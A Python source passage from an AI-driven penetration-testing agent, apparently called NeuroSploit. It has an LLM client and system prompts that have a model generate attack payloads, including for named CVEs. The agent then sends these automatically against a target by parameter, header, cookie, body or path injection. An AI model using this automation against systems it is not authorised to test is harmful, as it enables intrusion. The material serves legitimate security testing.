""" NeuroSploit v3 - Autonomous AI Security Agent REAL AI-powered penetration testing agent that: 1. Actually calls Claude/OpenAI API for intelligent analysis 2. Performs comprehensive reconnaissance 3. Tests vulnerabilities with proper verification (no false positives) 4. Generates detailed reports with CVSS, PoC, remediation """ import asyncio import aiohttp import json import re import os import hashlib from typing import Dict, List, Any, Optional, Callable, Tuple from dataclasses import dataclass, field, asdict from datetime import datetime from urllib.parse import urljoin, urlparse, parse_qs, urlencode from enum import Enum from pathlib import Path from backend.core.agent_memory import AgentMemory from backend.core.vuln_engine.registry import VulnerabilityRegistry from backend.core.vuln_engine.payload_generator import PayloadGenerator from backend.core.response_verifier import ResponseVerifier from backend.core.negative_control import NegativeControlEngine from backend.core.proof_of_execution import ProofOfExecution from backend.core.confidence_scorer import ConfidenceScorer from backend.core.validation_judge import ValidationJudge from backend.core.vuln_engine.system_prompts import get_system_prompt, get_prompt_for_vuln_type from backend.core.vuln_engine.ai_prompts import get_verification_prompt, get_poc_prompt from backend.core.access_control_learner import AccessControlLearner from backend.core.request_engine import RequestEngine, ErrorType from backend.core.waf_detector import WAFDetector from backend.core.strategy_adapter import StrategyAdapter from backend.core.chain_engine import ChainEngine from backend.core.auth_manager import AuthManager try: from core.browser_validator import BrowserValidator, embed_screenshot, HAS_PLAYWRIGHT except ImportError: HAS_PLAYWRIGHT = False BrowserValidator = None embed_screenshot = None # Try to import anthropic for Claude API try: import anthropic ANTHROPIC_AVAILABLE = True except ImportError: ANTHROPIC_AVAILABLE = False anthropic = None # Try to import openai try: import openai OPENAI_AVAILABLE = True except ImportError: OPENAI_AVAILABLE = False openai = None # Security sandbox (Docker-based real tools) try: from core.sandbox_manager import get_sandbox, SandboxManager HAS_SANDBOX = True except ImportError: HAS_SANDBOX = False class OperationMode(Enum): """Agent operation modes""" RECON_ONLY = "recon_only" FULL_AUTO = "full_auto" PROMPT_ONLY = "prompt_only" ANALYZE_ONLY = "analyze_only" AUTO_PENTEST = "auto_pentest" class FindingSeverity(Enum): CRITICAL = "critical" HIGH = "high" MEDIUM = "medium" LOW = "low" INFO = "info" @dataclass class CVSSScore: """CVSS 3.1 Score""" score: float severity: str vector: str @dataclass class Finding: """Vulnerability finding with full details""" id: str title: str severity: str vulnerability_type: str = "" cvss_score: float = 0.0 cvss_vector: str = "" cwe_id: str = "" description: str = "" affected_endpoint: str = "" parameter: str = "" payload: str = "" evidence: str = "" request: str = "" response: str = "" impact: str = "" poc_code: str = "" remediation: str = "" references: List[str] = field(default_factory=list) screenshots: List[str] = field(default_factory=list) affected_urls: List[str] = field(default_factory=list) ai_verified: bool = False confidence: str = "0" # Numeric string "0"-"100" confidence_score: int = 0 # Numeric confidence score 0-100 confidence_breakdown: Dict = field(default_factory=dict) # Scoring breakdown proof_of_execution: str = "" # What proof was found negative_controls: str = "" # Control test results ai_status: str = "confirmed" # "confirmed" | "rejected" | "pending" rejection_reason: str = "" @dataclass class ReconData: """Reconnaissance data""" subdomains: List[str] = field(default_factory=list) live_hosts: List[str] = field(default_factory=list) endpoints: List[Dict] = field(default_factory=list) parameters: Dict[str, List[str]] = field(default_factory=dict) technologies: List[str] = field(default_factory=list) forms: List[Dict] = field(default_factory=list) js_files: List[str] = field(default_factory=list) api_endpoints: List[str] = field(default_factory=list) def _get_endpoint_url(ep) -> str: """Safely get URL from endpoint (handles both str and dict)""" if isinstance(ep, str): return ep elif isinstance(ep, dict): return ep.get("url", "") return "" def _get_endpoint_method(ep) -> str: """Safely get method from endpoint""" if isinstance(ep, dict): return ep.get("method", "GET") return "GET" class LLMClient: """Unified LLM client for Claude, OpenAI, Ollama, and Gemini""" # Ollama and LM Studio endpoints OLLAMA_URL = os.getenv("OLLAMA_URL", "http://localhost:11434") LMSTUDIO_URL = os.getenv("LMSTUDIO_URL", "http://localhost:1234") GEMINI_URL = "https://generativelanguage.googleapis.com/v1beta" def __init__(self): self.anthropic_key = os.getenv("ANTHROPIC_API_KEY", "") self.openai_key = os.getenv("OPENAI_API_KEY", "") self.google_key = os.getenv("GOOGLE_API_KEY", "") self.ollama_model = os.getenv("OLLAMA_MODEL", "llama3.2") self.client = None self.provider = None self.error_message = None self.connection_tested = False # Validate keys are not placeholder values if self.anthropic_key in ["", "your-anthropic-api-key"]: self.anthropic_key = None if self.openai_key in ["", "your-openai-api-key"]: self.openai_key = None if self.google_key in ["", "your-google-api-key"]: self.google_key = None # Try providers in order of preference self._initialize_provider() def _initialize_provider(self): """Initialize the first available LLM provider""" # 1. Try Claude (Anthropic) if ANTHROPIC_AVAILABLE and self.anthropic_key: try: self.client = anthropic.Anthropic(api_key=self.anthropic_key) self.provider = "claude" print("[LLM] Claude API initialized successfully") return except Exception as e: self.error_message = f"Claude init error: {e}" print(f"[LLM] Claude initialization failed: {e}") # 2. Try OpenAI if OPENAI_AVAILABLE and self.openai_key: try: self.client = openai.OpenAI(api_key=self.openai_key) self.provider = "openai" print("[LLM] OpenAI API initialized successfully") return except Exception as e: self.error_message = f"OpenAI init error: {e}" print(f"[LLM] OpenAI initialization failed: {e}") # 3. Try Google Gemini if self.google_key: self.client = "gemini" # Placeholder - uses HTTP requests self.provider = "gemini" print("[LLM] Gemini API initialized") return # 4. Try Ollama (local) if self._check_ollama(): self.client = "ollama" # Placeholder - uses HTTP requests self.provider = "ollama" print(f"[LLM] Ollama initialized with model: {self.ollama_model}") return # 5. Try LM Studio (local) if self._check_lmstudio(): self.client = "lmstudio" # Placeholder - uses HTTP requests self.provider = "lmstudio" print("[LLM] LM Studio initialized") return # No provider available self._set_no_provider_error() def _check_ollama(self) -> bool: """Check if Ollama is running locally""" try: import requests response = requests.get(f"{self.OLLAMA_URL}/api/tags", timeout=2) return response.status_code == 200 except Exception: return False def _check_lmstudio(self) -> bool: """Check if LM Studio is running locally""" try: import requests response = requests.get(f"{self.LMSTUDIO_URL}/v1/models", timeout=2) return response.status_code == 200 except Exception: return False def _set_no_provider_error(self): """Set appropriate error message when no provider is available""" errors = [] if not ANTHROPIC_AVAILABLE and not OPENAI_AVAILABLE: errors.append("LLM libraries not installed (run: pip install anthropic openai)") if not self.anthropic_key and not self.openai_key and not self.google_key: errors.append("No API keys configured") if not self._check_ollama(): errors.append("Ollama not running locally") if not self._check_lmstudio(): errors.append("LM Studio not running locally") self.error_message = "No LLM provider available. " + "; ".join(errors) print(f"[LLM] WARNING: {self.error_message}") def is_available(self) -> bool: return self.client is not None def get_status(self) -> dict: """Get LLM status for debugging""" return { "available": self.is_available(), "provider": self.provider, "error": self.error_message, "anthropic_lib": ANTHROPIC_AVAILABLE, "openai_lib": OPENAI_AVAILABLE, "ollama_available": self._check_ollama(), "lmstudio_available": self._check_lmstudio(), "has_google_key": bool(self.google_key) } async def test_connection(self) -> Tuple[bool, str]: """Test if the API connection is working""" if not self.client: return False, self.error_message or "No LLM client configured" try: # Simple test prompt result = await self.generate("Say 'OK' if you can hear me.", max_tokens=10) if result: self.connection_tested = True return True, f"Connected to {self.provider}" return False, f"Empty response from {self.provider}" except Exception as e: return False, f"Connection test failed for {self.provider}: {str(e)}" async def generate(self, prompt: str, system: str = "", max_tokens: int = 4096) -> str: """Generate response from LLM""" if not self.client: raise LLMConnectionError(self.error_message or "No LLM provider available") default_system = "You are an expert penetration tester and security researcher. Provide accurate, technical, and actionable security analysis. Be precise and avoid false positives." try: if self.provider == "claude": message = self.client.messages.create( model="claude-sonnet-4-20250514", max_tokens=max_tokens, system=system or default_system, messages=[{"role": "user", "content": prompt}] ) return message.content[0].text elif self.provider == "openai": response = self.client.chat.completions.create( model="gpt-4-turbo-preview", max_tokens=max_tokens, messages=[ {"role": "system", "content": system or default_system}, {"role": "user", "content": prompt} ] ) return response.choices[0].message.content elif self.provider == "gemini": return await self._generate_gemini(prompt, system or default_system, max_tokens) elif self.provider == "ollama": return await self._generate_ollama(prompt, system or default_system) elif self.provider == "lmstudio": return await self._generate_lmstudio(prompt, system or default_system, max_tokens) except LLMConnectionError: raise except Exception as e: error_msg = str(e) print(f"[LLM] Error from {self.provider}: {error_msg}") raise LLMConnectionError(f"API call failed ({self.provider}): {error_msg}") return "" async def _generate_gemini(self, prompt: str, system: str, max_tokens: int) -> str: """Generate using Google Gemini API""" import aiohttp url = f"{self.GEMINI_URL}/models/gemini-pro:generateContent?key={self.google_key}" payload = { "contents": [{"parts": [{"text": f"{system}\n\n{prompt}"}]}], "generationConfig": {"maxOutputTokens": max_tokens} } async with aiohttp.ClientSession() as session: async with session.post(url, json=payload, timeout=aiohttp.ClientTimeout(total=60)) as response: if response.status != 200: error_text = await response.text() raise LLMConnectionError(f"Gemini API error ({response.status}): {error_text}") data = await response.json() return data.get("candidates", [{}])[0].get("content", {}).get("parts", [{}])[0].get("text", "") async def _generate_ollama(self, prompt: str, system: str) -> str: """Generate using local Ollama""" import aiohttp url = f"{self.OLLAMA_URL}/api/generate" payload = { "model": self.ollama_model, "prompt": prompt, "system": system, "stream": False } async with aiohttp.ClientSession() as session: async with session.post(url, json=payload, timeout=aiohttp.ClientTimeout(total=120)) as response: if response.status != 200: error_text = await response.text() raise LLMConnectionError(f"Ollama error ({response.status}): {error_text}") data = await response.json() return data.get("response", "") async def _generate_lmstudio(self, prompt: str, system: str, max_tokens: int) -> str: """Generate using LM Studio (OpenAI-compatible)""" import aiohttp url = f"{self.LMSTUDIO_URL}/v1/chat/completions" payload = { "messages": [ {"role": "system", "content": system}, {"role": "user", "content": prompt} ], "max_tokens": max_tokens, "stream": False } async with aiohttp.ClientSession() as session: async with session.post(url, json=payload, timeout=aiohttp.ClientTimeout(total=120)) as response: if response.status != 200: error_text = await response.text() raise LLMConnectionError(f"LM Studio error ({response.status}): {error_text}") data = await response.json() return data.get("choices", [{}])[0].get("message", {}).get("content", "") class LLMConnectionError(Exception): """Exception raised when LLM connection fails""" pass DEFAULT_ASSESSMENT_PROMPT = """You are NeuroSploit, an elite autonomous penetration testing AI agent. Your mission: identify real, exploitable vulnerabilities — zero false positives. ## METHODOLOGY (PTES/OWASP/WSTG aligned) ### Phase 1 — Reconnaissance & Fingerprinting - Discover all endpoints, parameters, forms, API paths, WebSocket URLs - Technology fingerprinting: language, framework, server, WAF, CDN - Identify attack surface: file upload, auth endpoints, admin panels, GraphQL ### Phase 2 — Technology-Guided Prioritization Select vulnerability types based on detected technology stack: - PHP/Laravel → LFI, command injection, SSTI (Blade), SQLi, file upload - Node.js/Express → NoSQL injection, SSRF, prototype pollution, SSTI (EJS/Pug) - Python/Django/Flask → SSTI (Jinja2), command injection, IDOR, mass assignment - Java/Spring → XXE, insecure deserialization, expression language injection, SSRF - ASP.NET → path traversal, XXE, header injection, insecure deserialization - API/REST → IDOR, BOLA, BFLA, JWT manipulation, mass assignment, rate limiting - GraphQL → introspection, injection, DoS via nested queries - WordPress → file upload, SQLi, XSS, exposed admin, plugin vulns ### Phase 3 — Active Testing (100 vuln types available) **OWASP Top 10 2021 coverage:** - A01 Broken Access Control: IDOR, BOLA, BFLA, privilege escalation, forced browsing, CORS - A02 Cryptographic Failures: weak encryption/hashing, cleartext transmission, SSL issues - A03 Injection: SQLi (error/union/blind/time), NoSQL, LDAP, XPath, command, SSTI, XSS, XXE - A04 Insecure Design: business logic, race condition, mass assignment - A05 Security Misconfiguration: headers, debug mode, directory listing, default creds - A06 Vulnerable Components: outdated dependencies, insecure CDN - A07 Auth Failures: JWT, session fixation, brute force, 2FA bypass, OAuth misconfig - A08 Data Integrity: insecure deserialization, cache poisoning, HTTP smuggling - A09 Logging Failures: log injection, improper error handling - A10 SSRF: standard SSRF, cloud metadata SSRF ### Phase 4 — Verification (multi-signal) Every finding MUST have: 1. Concrete HTTP evidence (request + response) 2. At least 2 verification signals OR high-confidence tester match 3. No speculative language — only confirmed exploitable issues 4. Screenshot capture when possible ### Phase 5 — Reporting - Each finding: title, severity, CVSS 3.1, CWE, PoC, impact, remediation - Prioritized by real-world exploitability - Executive summary with risk rating ## CRITICAL RULES - NEVER report theoretical/speculative vulnerabilities - ALWAYS verify with real HTTP evidence before confirming - Test systematically: every parameter, every endpoint, every form - Use technology hints to select the most relevant tests - Capture baseline responses before testing for accurate diff-based detection """ class AutonomousAgent: """ AI-Powered Autonomous Security Agent Performs real security testing with AI-powered analysis """ # Legacy vuln type → registry key mapping VULN_TYPE_MAP = { # Aliases → canonical registry keys "sqli": "sqli_error", "xss": "xss_reflected", "rce": "command_injection", "cors": "cors_misconfig", "lfi_rfi": "lfi", "file_inclusion": "lfi", "remote_code_execution": "command_injection", "broken_auth": "auth_bypass", "broken_access": "bola", "api_abuse": "rest_api_versioning", # Identity mappings — Injection (18) "sqli_error": "sqli_error", "sqli_union": "sqli_union", "sqli_blind": "sqli_blind", "sqli_time": "sqli_time", "command_injection": "command_injection", "ssti": "ssti", "nosql_injection": "nosql_injection", "ldap_injection": "ldap_injection", "xpath_injection": "xpath_injection", "graphql_injection": "graphql_injection", "crlf_injection": "crlf_injection", "header_injection": "header_injection", "email_injection": "email_injection", "expression_language_injection": "expression_language_injection", "log_injection": "log_injection", "html_injection": "html_injection", "csv_injection": "csv_injection", "orm_injection": "orm_injection", # XSS (5) "xss_reflected": "xss_reflected", "xss_stored": "xss_stored", "xss_dom": "xss_dom", "blind_xss": "blind_xss", "mutation_xss": "mutation_xss", # File Access (8) "lfi": "lfi", "rfi": "rfi", "path_traversal": "path_traversal", "xxe": "xxe", "file_upload": "file_upload", "arbitrary_file_read": "arbitrary_file_read", "arbitrary_file_delete": "arbitrary_file_delete", "zip_slip": "zip_slip", # Request Forgery (4) "ssrf": "ssrf", "ssrf_cloud": "ssrf_cloud", "csrf": "csrf", "cors_misconfig": "cors_misconfig", # Auth (8) "auth_bypass": "auth_bypass", "jwt_manipulation": "jwt_manipulation", "session_fixation": "session_fixation", "weak_password": "weak_password", "default_credentials": "default_credentials", "brute_force": "brute_force", "two_factor_bypass": "two_factor_bypass", "oauth_misconfiguration": "oauth_misconfiguration", # Authorization (6) "idor": "idor", "bola": "bola", "bfla": "bfla", "privilege_escalation": "privilege_escalation", "mass_assignment": "mass_assignment", "forced_browsing": "forced_browsing", # Client-Side (8) "clickjacking": "clickjacking", "open_redirect": "open_redirect", "dom_clobbering": "dom_clobbering", "postmessage_vulnerability": "postmessage_vulnerability", "websocket_hijacking": "websocket_hijacking", "prototype_pollution": "prototype_pollution", "css_injection": "css_injection", "tabnabbing": "tabnabbing", # Infrastructure (10) "security_headers": "security_headers", "ssl_issues": "ssl_issues", "http_methods": "http_methods", "directory_listing": "directory_listing", "debug_mode": "debug_mode", "exposed_admin_panel": "exposed_admin_panel", "exposed_api_docs": "exposed_api_docs", "insecure_cookie_flags": "insecure_cookie_flags", "http_smuggling": "http_smuggling", "cache_poisoning": "cache_poisoning", # Logic & Data (16) "race_condition": "race_condition", "business_logic": "business_logic", "rate_limit_bypass": "rate_limit_bypass", "parameter_pollution": "parameter_pollution", "type_juggling": "type_juggling", "insecure_deserialization": "insecure_deserialization", "subdomain_takeover": "subdomain_takeover", "host_header_injection": "host_header_injection", "timing_attack": "timing_attack", "improper_error_handling": "improper_error_handling", "sensitive_data_exposure": "sensitive_data_exposure", "information_disclosure": "information_disclosure", "api_key_exposure": "api_key_exposure", "source_code_disclosure": "source_code_disclosure", "backup_file_exposure": "backup_file_exposure", "version_disclosure": "version_disclosure", # Crypto & Supply (8) "weak_encryption": "weak_encryption", "weak_hashing": "weak_hashing", "weak_random": "weak_random", "cleartext_transmission": "cleartext_transmission", "vulnerable_dependency": "vulnerable_dependency", "outdated_component": "outdated_component", "insecure_cdn": "insecure_cdn", "container_escape": "container_escape", # Cloud & API (9) "s3_bucket_misconfiguration": "s3_bucket_misconfiguration", "cloud_metadata_exposure": "cloud_metadata_exposure", "serverless_misconfiguration": "serverless_misconfiguration", "graphql_introspection": "graphql_introspection", "graphql_dos": "graphql_dos", "rest_api_versioning": "rest_api_versioning", "soap_injection": "soap_injection", "api_rate_limiting": "api_rate_limiting", "excessive_data_exposure": "excessive_data_exposure", } def __init__( self, target: str, mode: OperationMode = OperationMode.FULL_AUTO, log_callback: Optional[Callable] = None, progress_callback: Optional[Callable] = None, auth_headers: Optional[Dict] = None, task: Optional[Any] = None, custom_prompt: Optional[str] = None, recon_context: Optional[Dict] = None, finding_callback: Optional[Callable] = None, lab_context: Optional[Dict] = None, scan_id: Optional[str] = None, ): self.target = self._normalize_target(target) self.mode = mode self.log = log_callback or self._default_log self.progress_callback = progress_callback self.finding_callback = finding_callback self.auth_headers = auth_headers or {} self.task = task self.custom_prompt = custom_prompt self.recon_context = recon_context self.lab_context = lab_context or {} self.scan_id = scan_id self._cancelled = False self._paused = False self._skip_to_phase: Optional[str] = None # Phase skip target self.session: Optional[aiohttp.ClientSession] = None self.llm = LLMClient() # VulnEngine integration (100 types, 428 payloads, 100 testers) self.vuln_registry = VulnerabilityRegistry() self.payload_generator = PayloadGenerator() self.response_verifier = ResponseVerifier() self.knowledge_base = self._load_knowledge_base() # PoC generator for confirmed findings from backend.core.poc_generator import PoCGenerator self.poc_generator = PoCGenerator() # Validation pipeline: negative controls + proof of execution + confidence scoring self.negative_controls = NegativeControlEngine() self.proof_engine = ProofOfExecution() self.confidence_scorer = ConfidenceScorer() self.validation_judge = ValidationJudge( self.negative_controls, self.proof_engine, self.confidence_scorer, self.llm, access_control_learner=getattr(self, 'access_control_learner', None) ) # Execution history for cross-scan learning try: from backend.core.execution_history import ExecutionHistory self.execution_history = ExecutionHistory() except Exception: self.execution_history = None # Access control learning engine (adapts from BOLA/BFLA/IDOR outcomes) try: self.access_control_learner = AccessControlLearner() except Exception: self.access_control_learner = None # Autonomy modules (lazy-init after session in __aenter__) self.request_engine = None self.waf_detector = None self.strategy = None self.chain_engine = ChainEngine(llm=self.llm) self.auth_manager = None self._waf_result = None # Data storage self.recon = ReconData() self.memory = AgentMemory() self.custom_prompts: List[str] = [] self.tool_executions: List[Dict] = [] self.rejected_findings: List[Finding] = [] self._sandbox = None # Lazy-init sandbox reference for tool runner @property def findings(self) -> List[Finding]: """Backward-compatible access to confirmed findings via memory""" return self.memory.confirmed_findings def cancel(self): """Cancel the agent execution""" self._cancelled = True self._paused = False # Unpause so cancel is immediate def is_cancelled(self) -> bool: """Check if agent was cancelled""" return self._cancelled def pause(self): """Pause the agent execution""" self._paused = True def resume(self): """Resume the agent execution""" self._paused = False def is_paused(self) -> bool: """Check if agent is paused""" return self._paused async def _wait_if_paused(self): """Block while paused, checking for cancel every second""" while self._paused and not self._cancelled: await asyncio.sleep(1) # Phase ordering for skip-to-phase support AGENT_PHASES = ["recon", "analysis", "testing", "enhancement", "completed"] def skip_to_phase(self, target_phase: str) -> bool: """Signal the agent to skip to a given phase""" if target_phase not in self.AGENT_PHASES: return False self._skip_to_phase = target_phase return True def _check_skip(self, current_phase: str) -> Optional[str]: """Check if we should skip to a phase ahead of current_phase""" target = self._skip_to_phase if not target: return None try: cur_idx = self.AGENT_PHASES.index(current_phase) tgt_idx = self.AGENT_PHASES.index(target) except ValueError: return None if tgt_idx > cur_idx: self._skip_to_phase = None return target self._skip_to_phase = None return None def _map_vuln_type(self, vuln_type: str) -> str: """Map agent vuln type name to VulnEngine registry key""" return self.VULN_TYPE_MAP.get(vuln_type, vuln_type) def _get_payloads(self, vuln_type: str) -> List[str]: """Get payloads from VulnEngine PayloadGenerator""" mapped = self._map_vuln_type(vuln_type) payloads = self.payload_generator.payload_libraries.get(mapped, []) if not payloads: # Try original name payloads = self.payload_generator.payload_libraries.get(vuln_type, []) return payloads @staticmethod def _load_knowledge_base() -> Dict: """Load vulnerability knowledge base JSON at startup""" kb_path = Path(__file__).parent.parent.parent / "data" / "vuln_knowledge_base.json" try: with open(kb_path, "r") as f: return json.load(f) except Exception: return {} async def add_custom_prompt(self, prompt: str): """Add a custom prompt to be processed""" self.custom_prompts.append(prompt) await self.log_llm("info", f"[USER PROMPT RECEIVED] {prompt}") # Process immediately if LLM is available if self.llm.is_available(): await self._process_custom_prompt(prompt) async def _process_custom_prompt(self, prompt: str): """Process a custom user prompt with the LLM and execute requested tests. Detects CVE references and vulnerability test requests, then ACTUALLY tests them against the target instead of just providing AI text responses. """ await self.log_llm("info", f"[AI] Processing user prompt: {prompt}") # Detect CVE references in prompt cve_match = re.search(r'CVE-\d{4}-\d{4,}', prompt, re.IGNORECASE) cve_id = cve_match.group(0).upper() if cve_match else None # Build context about available endpoints endpoints_info = [] for ep in self.recon.endpoints[:20]: endpoints_info.append(f"- {_get_endpoint_method(ep)} {_get_endpoint_url(ep)}") params_info = [] for param, values in list(self.recon.parameters.items())[:15]: params_info.append(f"- {param}: {values[:3]}") forms_info = [] for form in self.recon.forms[:10]: forms_info.append(f"- {form.get('method', 'GET')} {form.get('action', 'N/A')} fields={form.get('inputs', [])[:5]}") # Enhanced system prompt that requests actionable test plans system_prompt = f"""You are a senior penetration tester performing ACTIVE TESTING against {self.target}. The user wants you to ACTUALLY TEST for vulnerabilities, not just explain them. {'The user is asking about ' + cve_id + '. Research this CVE and generate specific test payloads.' if cve_id else ''} Current reconnaissance data: Target: {self.target} Endpoints ({len(self.recon.endpoints)} total): {chr(10).join(endpoints_info[:10]) if endpoints_info else ' None discovered yet'} Parameters ({len(self.recon.parameters)} total): {chr(10).join(params_info[:10]) if params_info else ' None discovered yet'} Forms ({len(self.recon.forms)} total): {chr(10).join(forms_info[:5]) if forms_info else ' None discovered yet'} Technologies detected: {', '.join(self.recon.technologies) if self.recon.technologies else 'None'} CRITICAL: You must respond with a TEST PLAN in JSON format. The agent will EXECUTE these tests. Available injection points: "parameter", "header", "cookie", "body", "path" Available vuln types: xss_reflected, xss_stored, sqli_error, sqli_union, sqli_blind, sqli_time, command_injection, ssti, lfi, rfi, path_traversal, ssrf, xxe, crlf_injection, header_injection, host_header_injection, open_redirect, csrf, nosql_injection, idor, cors_misconfig Respond in this JSON format: {{ "analysis": "What the user is asking and your security assessment", "action": "test_cve|test_endpoint|test_parameter|scan_for|analyze|info", "vuln_type": "primary vulnerability type to test", "injection_point": "parameter|header|cookie|body|path", "header_name": "X-Forwarded-For", "payloads": ["payload1", "payload2", "payload3"], "targets": ["specific URLs to test"], "vuln_types": ["list of vuln types if scanning for multiple"], "response": "Brief explanation shown to the user" }} For CVE testing, include at least 5 specific payloads based on the CVE's attack vector. Always set action to "test_cve" or "test_endpoint" when the user asks to test something.""" # Append anti-hallucination directives system_prompt += "\n\n" + get_system_prompt("testing") try: response = await self.llm.generate(prompt, system=system_prompt) if not response: await self.log_llm("warning", "[AI] No response from LLM") return await self.log_llm("info", f"[AI] Analyzing request and building test plan...") import json try: json_match = re.search(r'\{[\s\S]*\}', response) if json_match: action_data = json.loads(json_match.group()) action = action_data.get("action", "info") targets = action_data.get("targets", []) vuln_types = action_data.get("vuln_types", []) vuln_type = action_data.get("vuln_type", "") injection_point = action_data.get("injection_point", "parameter") header_name = action_data.get("header_name", "") payloads = action_data.get("payloads", []) ai_response = action_data.get("response", response) await self.log_llm("info", f"[AI] {ai_response[:300]}") # ── CVE Testing: Actually execute tests ── if action == "test_cve": await self.log_llm("info", f"[AI] Executing CVE test plan: {vuln_type} via {injection_point}") await self._execute_cve_test( cve_id or "CVE-unknown", vuln_type, injection_point, header_name, payloads, targets ) elif action == "test_endpoint" and targets: await self.log_llm("info", f"[AI] Testing {len(targets)} endpoints...") for target_url in targets[:5]: if payloads and vuln_type: # Use AI-generated payloads with correct injection await self._execute_targeted_test( target_url, vuln_type, injection_point, header_name, payloads ) else: await self._test_custom_endpoint(target_url, vuln_types or ["xss_reflected", "sqli_error"]) elif action == "test_parameter" and targets: await self.log_llm("info", f"[AI] Testing parameters: {targets}") await self._test_custom_parameters(targets, vuln_types or ["xss_reflected", "sqli_error"]) elif action == "scan_for" and vuln_types: await self.log_llm("info", f"[AI] Scanning for: {vuln_types}") for vtype in vuln_types[:5]: await self._scan_for_vuln_type(vtype) elif action == "analyze": await self.log_llm("info", f"[AI] Analysis complete") else: await self.log_llm("info", f"[AI] Response provided - no active test needed") else: await self.log_llm("info", f"[AI RESPONSE] {response[:1000]}") except json.JSONDecodeError: await self.log_llm("info", f"[AI RESPONSE] {response[:1000]}") except Exception as e: await self.log_llm("error", f"[AI] Error processing prompt: {str(e)}") async def _test_custom_endpoint(self, url: str, vuln_types: List[str]): """Test a specific endpoint for vulnerabilities""" if not self.session: return await self.log("info", f" Testing endpoint: {url}") try: # Parse URL to find parameters parsed = urlparse(url) params = parse_qs(parsed.query) if not params: # Try adding common parameters params = {"id": ["1"], "q": ["test"]} for param_name in list(params.keys())[:3]: for vtype in vuln_types[:2]: payloads = self._get_payloads(vtype)[:2] for payload in payloads: await self._test_single_param(url, param_name, payload, vtype) except Exception as e: await self.log("debug", f" Error testing {url}: {e}") async def _test_custom_parameters(self, param_names: List[str], vuln_types: List[str]): """Test specific parameters across known endpoints""" endpoints_with_params = [ ep for ep in self.recon.endpoints if any(p in str(ep) for p in param_names) ] if not endpoints_with_params: # Use all endpoints that have parameters endpoints_with_params = self.recon.endpoints[:10] for ep in endpoints_with_params[:5]: url = _get_endpoint_url(ep) for param in param_names[:3]: for vtype in vuln_types[:2]: payloads = self._get_payloads(vtype)[:2] for payload in payloads: await self._test_single_param(url, param, payload, vtype) async def _execute_cve_test(self, cve_id: str, vuln_type: str, injection_point: str, header_name: str, payloads: List[str], targets: List[str]): """Execute actual CVE testing with AI-generated payloads against the target.""" await self.log("warning", f" [CVE TEST] Testing {cve_id} ({vuln_type}) via {injection_point}") # Build test targets: use AI-suggested URLs or fall back to discovered endpoints test_urls = targets[:5] if targets else [] if not test_urls: test_urls = [self.target] for ep in self.recon.endpoints[:10]: ep_url = _get_endpoint_url(ep) if ep_url and ep_url not in test_urls: test_urls.append(ep_url) # Also use payloads from the PayloadGenerator as fallback all_payloads = list(payloads[:10]) registry_payloads = self._get_payloads(vuln_type)[:5] for rp in registry_payloads: if rp not in all_payloads: all_payloads.append(rp) findings_count = 0 for test_url in test_urls[:5]: if self.is_cancelled(): return await self.log("info", f" [CVE TEST] Testing {test_url[:60]}...") for payload in all_payloads[:10]: if self.is_cancelled(): return # Use correct injection method if injection_point == "header": test_resp = await self._make_request_with_injection( test_url, "GET", payload, injection_point="header", header_name=header_name or "X-Forwarded-For" ) param_name = header_name or "X-Forwarded-For" elif injection_point in ("body", "cookie", "path"): parsed = urlparse(test_url) params = list(parse_qs(parsed.query).keys()) if parsed.query else ["data"] test_resp = await self._make_request_with_injection( test_url, "POST" if injection_point == "body" else "GET", payload, injection_point=injection_point, param_name=params[0] if params else "data" ) param_name = params[0] if params else "data" else: # parameter parsed = urlparse(test_url) params = list(parse_qs(parsed.query).keys()) if parsed.query else ["id", "q"] param_name = params[0] if params else "id" test_resp = await self._make_request_with_injection( test_url, "GET", payload, injection_point="parameter", param_name=param_name ) if not test_resp: continue # Verify the response is_vuln, evidence = await self._verify_vulnerability( vuln_type, payload, test_resp, None ) if is_vuln: evidence = f"[{cve_id}] {evidence}" finding = self._create_finding( vuln_type, test_url, param_name, payload, evidence, test_resp, ai_confirmed=True ) finding.title = f"{cve_id} - {finding.title}" finding.references.append(f"https://nvd.nist.gov/vuln/detail/{cve_id}") await self._add_finding(finding) findings_count += 1 await self.log("warning", f" [CVE TEST] {cve_id} CONFIRMED at {test_url[:50]}") break # One finding per URL is enough if findings_count == 0: await self.log("info", f" [CVE TEST] {cve_id} not confirmed after testing {len(test_urls)} targets with {len(all_payloads)} payloads") else: await self.log("warning", f" [CVE TEST] {cve_id} found {findings_count} vulnerable endpoint(s)") async def _execute_targeted_test(self, url: str, vuln_type: str, injection_point: str, header_name: str, payloads: List[str]): """Execute targeted vulnerability tests with specific payloads and injection point.""" await self.log("info", f" [TARGETED] Testing {vuln_type} via {injection_point} at {url[:60]}") for payload in payloads[:10]: if self.is_cancelled(): return parsed = urlparse(url) params = list(parse_qs(parsed.query).keys()) if parsed.query else ["id"] param_name = params[0] if params else "id" if injection_point == "header": param_name = header_name or "X-Forwarded-For" test_resp = await self._make_request_with_injection( url, "GET", payload, injection_point=injection_point, param_name=param_name, header_name=header_name ) if not test_resp: continue is_vuln, evidence = await self._verify_vulnerability( vuln_type, payload, test_resp, None ) if is_vuln: finding = self._create_finding( vuln_type, url, param_name, payload, evidence, test_resp, ai_confirmed=True ) await self._add_finding(finding) await self.log("warning", f" [TARGETED] {vuln_type} confirmed at {url[:50]}") return await self.log("info", f" [TARGETED] {vuln_type} not confirmed at {url[:50]}") async def _scan_for_vuln_type(self, vuln_type: str): """Scan all endpoints for a specific vulnerability type""" await self.log("info", f" Scanning for {vuln_type.upper()} vulnerabilities...") vuln_lower = vuln_type.lower() # Handle header-based vulnerabilities (no payloads needed) if vuln_lower in ["clickjacking", "x-frame-options", "csp", "hsts", "headers", "security headers", "missing headers"]: await self._test_security_headers(vuln_lower) return # Handle CORS testing if vuln_lower in ["cors", "cross-origin"]: await self._test_cors() return # Handle information disclosure if vuln_lower in ["info", "information disclosure", "version", "technology"]: await self._test_information_disclosure() return # Standard payload-based testing payloads = self._get_payloads(vuln_type)[:3] if not payloads: # Try AI-based testing for unknown vuln types await self._ai_test_vulnerability(vuln_type) return for ep in self.recon.endpoints[:10]: url = _get_endpoint_url(ep) for param in list(self.recon.parameters.keys())[:5]: for payload in payloads: await self._test_single_param(url, param, payload, vuln_type) async def _test_security_headers(self, vuln_type: str): """Test for security header vulnerabilities like clickjacking""" await self.log("info", f" Testing security headers...") # Test main target and key pages test_urls = [self.target] for ep in self.recon.endpoints[:5]: url = _get_endpoint_url(ep) if isinstance(ep, dict) else ep if url and url not in test_urls: test_urls.append(url) for url in test_urls: if self.is_cancelled(): return try: async with self.session.get(url, allow_redirects=True, 